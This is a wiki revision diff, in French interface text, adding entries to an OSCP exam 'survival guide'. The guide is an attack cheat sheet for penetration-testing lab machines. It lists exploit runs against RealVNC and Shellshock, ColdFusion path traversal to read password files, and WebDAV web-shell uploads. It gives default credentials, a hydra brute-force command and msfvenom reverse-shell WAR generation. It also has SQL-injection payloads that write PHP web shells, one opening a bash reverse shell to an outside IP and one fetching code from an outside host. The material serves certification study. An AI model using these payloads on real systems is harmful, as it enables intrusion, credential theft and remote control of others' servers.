Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
oscp_survival_guide [2020/11/25 14:16] M0N5T3R |
oscp_survival_guide [2020/11/25 14:39] (Version actuelle) M0N5T3R |
||
---|---|---|---|
Ligne 2754: | Ligne 2754: | ||
https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh | https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh | ||
+ | RealVNC | ||
+ | RealVNC : https://www.exploit-db.com/exploits/36932 | ||
+ | Edit, BIND_ADDR into mine and BIND_PORT into 4444 | ||
+ | root@kali:~/PWK$python RealVNC-exploit-36932.py | ||
+ | [] Please input an IP address to pwn: 10.11.1.227 | ||
+ | [] Hello From Server: RFB 003.008 | ||
+ | Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del | ||
+ | |||
+ | |||
+ | XAMPP | ||
+ | XAMPP cred(wampp/xampp) | ||
+ | |||
+ | ColdFusion (Vulnerable) | ||
+ | Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl | ||
+ | LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen | ||
+ | (either – neo-security.xml and password.properties) | ||
+ | ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ | ||
+ | exploit/windows/http/coldfusion_fckeditor – only for 8.0.1 | ||
+ | |||
+ | Webdav | ||
+ | WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229 | ||
+ | auxiliary : webdav_test | ||
+ | 1 cadaver http://10.11.x.x/webdav/ | ||
+ | Uploading shells.txt to `shells.txt’ | ||
+ | 1 dav:> put shells.txt | ||
+ | 2 dav:> copy shells.txt shells.asp;.txt | ||
+ | |||
+ | PHPAdmin | ||
+ | http://.../phpmyadmin | ||
+ | db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank) | ||
+ | You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" | ||
+ | |||
+ | Tomcat | ||
+ | Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html | ||
+ | You can upload reverse shell on manager consor ; msfvenom jsp or war file | ||
+ | msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war | ||
+ | jar -xvf shell.war | ||
+ | |||
+ | |||
+ | Windows IIS | ||
+ | Getting Windows 0S and version details through Nikto / Nmap Scanning. | ||
+ | auxiliary/admin/http/iis_auth_bypass | ||
+ | |||
+ | mysql | ||
+ | nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306 | ||
+ | MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac | ||
+ | MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php' | ||
+ | UPLOAD A FILE : | ||
+ | ' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' # | ||
+ | OPEN A PHP SHELL : | ||
+ | ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE | ||
+ | |||
+ | |||
+ | ShellShock | ||
+ | nikto scan results; shows shellshock on /cgi-bin; use 34900.py | ||
+ | root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234 | ||
+ | [!] Started reverse shell handler | ||
+ | [-] Trying exploit on : /cgi-bin/status" | ||
+ | |||
+ | Squid | ||
+ | proxy scanner/http/squid_pivot_scanning | ||
+ | RHOST : Target | ||
+ | RANGE : Target | ||
+ | RPORT : Squid port | ||
+ | msf auxiliary(scanner/http/squid_pivot_scanning) > run | ||
+ | [+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED | ||
+ | [+] [192.168.88.155] 192.168.88.155:80 seems OPEN | ||
+ | if the target uses squid proxy via 3128 port, use nikto with that proxy setting | ||
+ | nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128" | ||
+ | |||
+ | RFI(Remote File Inclusion) | ||
+ | browse.php?file=http://10.11.0.42/index.html | ||
+ | browse.php?file=ftp://10.11.0.42/index.html | ||
+ | browse.php?expect://ls | ||
+ | |||
+ | Uploading malicious .php file on database | ||
+ | http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html | ||
+ | |||
</code> | </code> |